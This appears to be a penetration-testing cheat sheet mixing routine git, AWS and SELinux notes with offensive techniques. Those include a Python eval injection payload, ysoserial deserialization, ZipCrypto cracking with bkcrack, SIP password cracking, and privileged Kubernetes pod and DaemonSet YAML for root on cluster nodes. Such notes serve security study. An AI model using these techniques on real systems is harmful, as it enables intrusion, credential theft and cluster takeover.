Return to Main Page

Miscellaneous

Git Repo Analysis

  • git command cheat sheet
    • Check current status git status
    Check logs
  • git log
  • git log --oneline
    		•
    Show differences between a specified commit and the previous one git show <commit>
    Check differences between current commit and last
  • git diff
    		•
    Check differences between two specific commits git diff <older commit> <newer commit>

    AWS

  • General Commands
    • install aws cli apt install awscli
    Configure / Connect to AWS Instance
  • aws configure
    • AWS Access Key ID [None]: <AWS Access Key>
    • AWS Secret Access Key [None]: <AWS Secret Access Key>
    • Default region name [None]: <Default region name>
    • Default ouput name [None]:
    Specify aws endpoint (if not targetting actual AWS servers)
  • aws <command> --endpoint-url=<url>
    • the cli tool awslocal specifies the localhost by default
  • Lambda
    • List functions aws lambda list-functions --endpoint-url=<url>
  • s3
    • Bucket link format: http://s3.[host]/[bucket name]/[file]
    Get s3 buckets
  • aws s3api list-buckets
  • aws s3 ls s3://
    		•
    View s3 bucket aws s3 ls s3://<bucket name>
    Copy file to s3 bucket aws s3 cp <local file> s3://<bucket name>/<file to save>
  • Dynamodb
    • List tables aws dynamodb list-tables
    Dump table contents aws dynamodb scan --table-name <table name>
    Create a table
  • aws dynamodb create-table --cli-input-json file://table.json
  • table.json example:
    • {
    "TableName": "alerts",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 10,
      "WriteCapacityUnits": 5
    }
}
    Add item to table
  • aws dynamodb put-item --cli-input-json file://item.json
  • item.json example:
    • {
	"TableName": "alerts",
	"Item":{
		"title":{
			"S":"Ransomware"
		},
		"data":{
			"S":"This is a test"
		}
	}
}
  • CloudWatch / Logs
    • Get log group names aws logs describe-log-groups
    Get log group datastream information awslocal logs describe-log-streams --log-group-name <logGroupName>
  • Secrets Manager
    • List secrets aws secretsmanager list-secrets
    Get secrets for specified secret 'Name' aws secretsmanager get-secret-value --secret-id '<secret 'Name'>'
  • Key Management System
    • List keys aws kms list-keys
    Get information about a key aws kms describe-key --key-id <key id>
    Decrypt file aws kms decrypt --ciphertext-blob fileb://<encrypted file> --key-id <key id> --encryption-algorithm <algorithm from describe-key>

    SELinux

    Set/check enforcement level setenforce -h
    Easy way to allow things audit2allow -i <input>
    grep denied /var/log/audit/audit.log | grep read | tail -1 | audit2allow
    Analyze SELinux logs (/var/log/audit/audit.log) audit2why
    View policies getsebool -a
    Set policies setsebool
    View port policies semanage port -l

    Python Command Injection

  • Test for injection: enter math calculation such as 2*2. If the math is being evaluated then a vulnerability might exist.
  • Inject commands:
    • eval('__import__("os").system("<command>")')
  • Good resource: https://www.stackhawk.com/blog/command-injection-python/#os-commands

    • Reading Different File Types

    File Type Tools
    ost
  • readpst
    • Read output using evolution
    SQLite 3
  • sqlite3 <sSQLite 3.x db file> .dump
  • sqlitebrowser
    		•
    .exe
  • dnSpy
    • .NET assembly file Debugger
  • WASM
    		•
  • https://github.com/WebAssembly/wabt
    • wasm2wat convert to readable text
    wat2wasm Convert back to wasm File
  • asar
    		•
  • ASAR tool (npm -g install asar)
    • extract files from .asar file
    • asar e <input>.asar main.js
    .pyc
  • Uncompyle6
    • https://pypi.org/project/uncompyle6/2.13.3/

    Steganography

  • Steganography: hiding a secret message inside of another file (picture, video, message, etc.)
  • Tools
    • steghide
      • Example Usage:
          • Extract data from an image using a password steghide extract -sf <File Name> -p <password>
          Extract data extract
          Specify file to extract from -sf <file name>
          passphrase -p
      • If -p flag is not used then we will be prompted for a password.
      • We will be prompted for a password whether it is or protected by one or not.

    Port Knocking

  • Linux configuration file
    • /etc/knockd.conf
  • Port knocking tools
    • knock
    • netcat
      • Example netcat port knocking script: for i in <port #> <port #> <port #>; do nc -nv <ip address> $i; done;
    • nmap

    VoIP

  • SIPVicious - Pentest tool suite
    • svmap
      • sip scanner. Scans ip address space for SIP servers.
    • svwar
      • Scans for working extensions. Also tells if the extension line requires authentication or not.
      • Example usage:
        • svwar -e 1-10000 10.129.1.226 -m INVITE Scan extentions 1-10000 on ip 10.129.1.266 using the INVITE method
    • svcrack
      • Password cracker using digest authentication. Cracks passwords on both registrar and proxy servers.
    • svreport
      • Manages sessions created by the other tools and export to pdf, xml, csv, and plain text.
    • svcrash
      • Responds to svwar and svcrack SIP message that causes old version to crash

    HTTP Cookie Flags

  • HTTP Cookie Flags
    • Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
`[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
    Http Flag Description
    Expires
  • By default a cookie lifespan lasts one session, which is traditionally until a browser closes. Modern browsers might hold onto a cookie longer than that.
  • Set the shortest reasonable cookie life span for maxmimum security
    		•
    Max-age
    Domain
  • By default a cookie will only be shared with the subdomain that it was generated from.
  • The domain flag allows you to change the scope of where the cookie shared. If the domain get changed from the subdomain to the root domain then every subdomain of that root will have access to the cookie.
    		•
    Path
  • By default a cookie is only shared with the web path that generated it.
  • The path paramter can be used to modify the scope of the web path that has access to the cookie. If the path paramater gets set to / (root) then every path on the website will get access to the cookie.
    		•
    Secure
  • By default cookies can be sent over HTTP and HTTPS.
  • The secure flag will only allow cookies to be sent over HTTPS.
    		•
    HttpOnly Makes the cookie inaccessible to client side scripts. If a browser does not support the HttpOnly flag then the cookie will still be accessible by scripts.
    SameSite
  • When browsing to a website that pulls resources from other websites your browser can send any cookies you have for those websites.
  • This flag will alter that behavior based on one of it's three values: Strict, Lax, and None

    • Strict The web request origin must come from you every time.
    Lax The web request can be cross-origin if it is an HTTP GET request and you are navigating to the root directory. Cookies will not be sent when a website loads images or something else from an external site that you have cookies
    None Cookies will always be sent. If None is set then Secure must also be set or the cookie will not be sent.

    Java Deserialization

  • Use ysoserial to generate malicious java serialization file.
    • https://github.com/frohoff/ysoserial
      • Download ysoserial-master-SNAPSHOT.jar from the Installation section
  • Syntax: java -jar ysoserial-master-SNAPSHOT.jar <payload type> '<command>'

    • Gitlab

  • Configuration file - /etc/gitlab/gitlab.rb
  • Access console: gitlab-rails console
  • Console Commands:
    • Show active users User.active
    Show admins User.admins
    Change user password
  • <variable> = User.find(<user id #>)
  • <user variable>.password = '<new password>'
  • <user variable>.password_confirmation = '<new password>'
  • <user variable>.save
    		•

    Zip File Analysis

  • Tools
    • zipdetails
    • 7z
      • List Files
    • l <zip file>
    • l -lst <zip file>
      • List CRC for each file
      • List encrypytion method for each file
        • Method = ZipCrypto
          • Vulerable to plaintext attack
            • Only need to know 10 plaintext characters that exist in the encrypted/zipped file
              • The more plaintext, the quicker the attack
            • Attack steps
              • Zip plaintext (that mirrors text from the encrypted file) zip plaintext.zip plaintex.txt
              Check CRC from zipped plaintext file, make sure it is the same as the encrypted file l -lst <zip file>
              Get keys for encrypted file bkcrack -C <encrypted zip> -c <encrypted target file on zip> -P <plaintext zip> -p <plaintext from target encrypted file>
              Change encrypted zip password bkcrack -C <Encrypted zip file> -k <keys from previous command> -U <output zip> <new password>

    Kubernetes

  • Kubelete - port 10250
    • View running pods kubeletctl -s <node ip> pods
    Get a shell on a pod kubeletctl exec /bin/sh -p <pod name> -n <namespace> -c <container name> -s <node ip>
  • API Server - Port 8443
    • Run a command kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 <command>
  • Token and ca.crt come from pod directory
    • /run/secrets/kubernetes.io/serviceaccount
  • Token must be exported to an environment variable for it to work (unconfirmed)
    		•
    Get list of pods kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 get pods
    List Permissions kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 auth can-i --list
    • If permission to create a pod, then create one with host file system mounted inside
      • https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/
      • Create noderoot.yml
        • apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
      • Create the new node: kubectl create -f noderoot.yml
      • Get a shell on the new node: kubectl exec -it noderootpod chroot /host
        • If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod
      • In order to gain root on all nodes in a cluster use a DaemonSet instead:
          • apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: noderootpod
  labels:
spec:
  selector:
    matchLabels:
      name: noderootdaemon
  template:
    metadata:
      labels:
        name: noderootdaemon
    spec:
      tolerations:
      - key: node-role.kubernetes.io/master
        effect: NoSchedule
      hostNetwork: true
      hostPID: true
      hostIPC: true
      containers:
      - name: noderootpod
        image: busybox (or another valid known image, i.e. pick one from another pre-existing pod)
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: noderoot
        command: [ "/bin/sh", "-c", "--" ]
        args: [ "while true; do sleep 30; done;" ]
      volumes:
      - name: noderoot
        hostPath:
          path: /
        • Get root on chosen pod
          • Get a shell on a pod: kubectl exec -it <chosen pod from "kubectl get po" output> chroot /host
            • If unable to exec on new pod using kubectl, then try kubeletctl to access the new pod

    Unprotect Excel Document

  • Open excel file with 7zip
  • Find the worksheet that is protected (xl/worksheet)
  • Remove full tag for "sheetProtection"